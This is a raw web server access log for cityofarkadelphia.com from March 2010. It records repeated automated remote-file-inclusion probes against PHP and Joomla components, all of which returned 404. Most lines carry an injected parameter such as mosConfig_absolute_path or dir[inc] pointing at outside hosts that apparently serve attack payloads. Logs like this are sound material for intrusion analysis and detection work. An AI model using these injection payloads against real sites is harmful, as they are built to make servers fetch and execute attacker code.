204.202.2.23 - - [01/Mar/2010:12:30:29 -0800] "GET /logs/access_091101.log/send_reminders.php?noSet=0&includedir=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
204.202.2.23 - - [01/Mar/2010:12:31:14 -0800] "GET /logs/access_091001.log/send_reminders.php?noSet=0&includedir=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:12:36:05 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:12:36:05 -0800] "GET /logs/access_091201.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:12:36:05 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:12:36:26 -0800] "GET /logs/access_091031.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:12:36:44 -0800] "GET /logs/access_090329.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:12:36:44 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:12:36:45 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:12:37:07 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:12:37:07 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:12:37:07 -0800] "GET /logs/access_091201.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:12:37:10 -0800] "GET /logs/access_091201.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:12:37:16 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:12:37:16 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:12:37:17 -0800] "GET /logs/access_090329.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:12:37:36 -0800] "GET /logs/access_091031.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:12:37:43 -0800] "GET /logs/access_091201.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:48:03 -0800] "GET /param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:48:03 -0800] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:48:03 -0800] "GET /logs/access_091231.log//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:48:09 -0800] "GET /logs/access_091231.log//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:48:09 -0800] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:48:12 -0800] "GET /param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.46.204.231 - - [01/Mar/2010:12:48:42 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:49:16 -0800] "GET /logs/access_081230.log//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.46.204.231 - - [01/Mar/2010:12:50:14 -0800] "GET /?N=D HTTP/1.1" 200 917 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:51:24 -0800] "GET /logs/access_091231.log//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:51:24 -0800] "GET /param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:51:24 -0800] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:51:50 -0800] "GET /logs/access_081230.log//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:12:54:56 -0800] "GET /logs//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:12:54:56 -0800] "GET /private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:12:54:56 -0800] "GET /logs/access_091031.log//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:57:05 -0800] "GET /logs/access_081201.log//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:57:05 -0800] "GET /aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:57:05 -0800] "GET /logs//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:57:11 -0800] "GET /logs/access_100201.log//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:57:19 -0800] "GET /logs/access_081201.log//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:57:19 -0800] "GET /aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:57:19 -0800] "GET /logs//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:57:23 -0800] "GET /logs/access_091231.log//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:57:47 -0800] "GET /logs//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:57:47 -0800] "GET /logs/access_091231.log//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:57:47 -0800] "GET /aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:12:58:04 -0800] "GET /logs/access_090401.log//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:13:00:10 -0800] "GET /logs/access_090101.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:13:00:10 -0800] "GET /param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:13:00:10 -0800] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:13:00:24 -0800] "GET /logs/access_081101.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:13:03:50 -0800] "GET /logs//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:13:03:50 -0800] "GET /aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:13:03:50 -0800] "GET /logs/access_081201.log//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:13:03:56 -0800] "GET /logs/access_100201.log//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:13:06:24 -0800] "GET /logs/access_091231.log//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [01/Mar/2010:13:16:29 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.whites.xpg.com.br/zfx/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [01/Mar/2010:13:16:29 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.whites.xpg.com.br/zfx/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [01/Mar/2010:13:16:29 -0800] "GET /logs/access_090401.log//modules/TotalCalendar/about.php?inc_dir=http://www.whites.xpg.com.br/zfx/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.240.39.222 - - [01/Mar/2010:13:17:17 -0800] "GET /logs/access_090501.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.240.39.222 - - [01/Mar/2010:13:17:17 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.240.39.222 - - [01/Mar/2010:13:17:17 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.240.39.222 - - [01/Mar/2010:13:17:29 -0800] "GET /logs/access_090101.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:13:17:52 -0800] "GET /private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:13:17:52 -0800] "GET /logs//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:13:17:52 -0800] "GET /logs/access_091031.log//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:13:18:48 -0800] "GET /logs/access_090401.log//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [01/Mar/2010:13:18:53 -0800] "GET /logs/access_090301.log//modules/TotalCalendar/about.php?inc_dir=http://www.whites.xpg.com.br/zfx/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:13:21:29 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:13:21:29 -0800] "GET /appserv/main.php?appserv_root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:13:21:29 -0800] "GET /logs/access_091001.log//appserv/main.php?appserv_root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:13:21:50 -0800] "GET /logs/access_091001.log//appserv/main.php?appserv_root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:13:21:50 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:13:21:50 -0800] "GET /appserv/main.php?appserv_root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.233.3.101 - - [01/Mar/2010:13:23:14 -0800] "GET /logs//blastchatc.php?mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.233.3.101 - - [01/Mar/2010:13:23:14 -0800] "GET /logs/access_090101.log//blastchatc.php?mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.233.3.101 - - [01/Mar/2010:13:23:14 -0800] "GET /blastchatc.php?mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:25:05 -0800] "GET /logs/access_090101.log/Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:25:05 -0800] "GET /Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:25:05 -0800] "GET /logs/Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:25:21 -0800] "GET /Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:25:21 -0800] "GET /logs/Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:25:21 -0800] "GET /logs/access_090101.log/Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:25:28 -0800] "GET /logs/Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:25:28 -0800] "GET /logs/access_090101.log/Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:25:28 -0800] "GET /Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:25:31 -0800] "GET /logs/access_090101.log/Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:25:32 -0800] "GET /Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:25:32 -0800] "GET /logs/Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:25:35 -0800] "GET /Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:25:35 -0800] "GET /logs/access_090101.log/Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:25:35 -0800] "GET /logs/Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:25:40 -0800] "GET /logs/Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:25:40 -0800] "GET /Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:25:40 -0800] "GET /logs/access_090101.log/Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:13:31:19 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:13:31:22 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:13:31:22 -0800] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:13:31:50 -0800] "GET /logs/access_091001.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.233.3.101 - - [01/Mar/2010:13:34:19 -0800] "GET /logs/access_090101.log%20%20//blastchatc.php?mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:13:36:16 -0800] "GET /appserv/main.php?appserv_root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:13:36:16 -0800] "GET /logs/access_091001.log//appserv/main.php?appserv_root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:13:36:16 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:13:36:44 -0800] "GET /logs/access_091031.log//appserv/main.php?appserv_root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:37:20 -0800] "GET /logs/access_090101.log%20%20/Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:44:52 -0800] "GET /logs/access_090101.log%20%20/Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:45:58 -0800] "GET /logs/access_090101.log%20%20/Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:46:34 -0800] "GET /logs/access_090101.log%20%20/Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:46:42 -0800] "GET /logs/access_090101.log%20%20/Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.197.10 - - [01/Mar/2010:13:47:34 -0800] "GET /logs/access_090101.log%20%20/Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
221.141.1.113 - - [01/Mar/2010:13:53:50 -0800] "GET /logs///tiny_includes/config.php?dir_ws=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
221.141.1.113 - - [01/Mar/2010:13:53:57 -0800] "GET /logs///tiny_includes/config.php?dir_ws=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
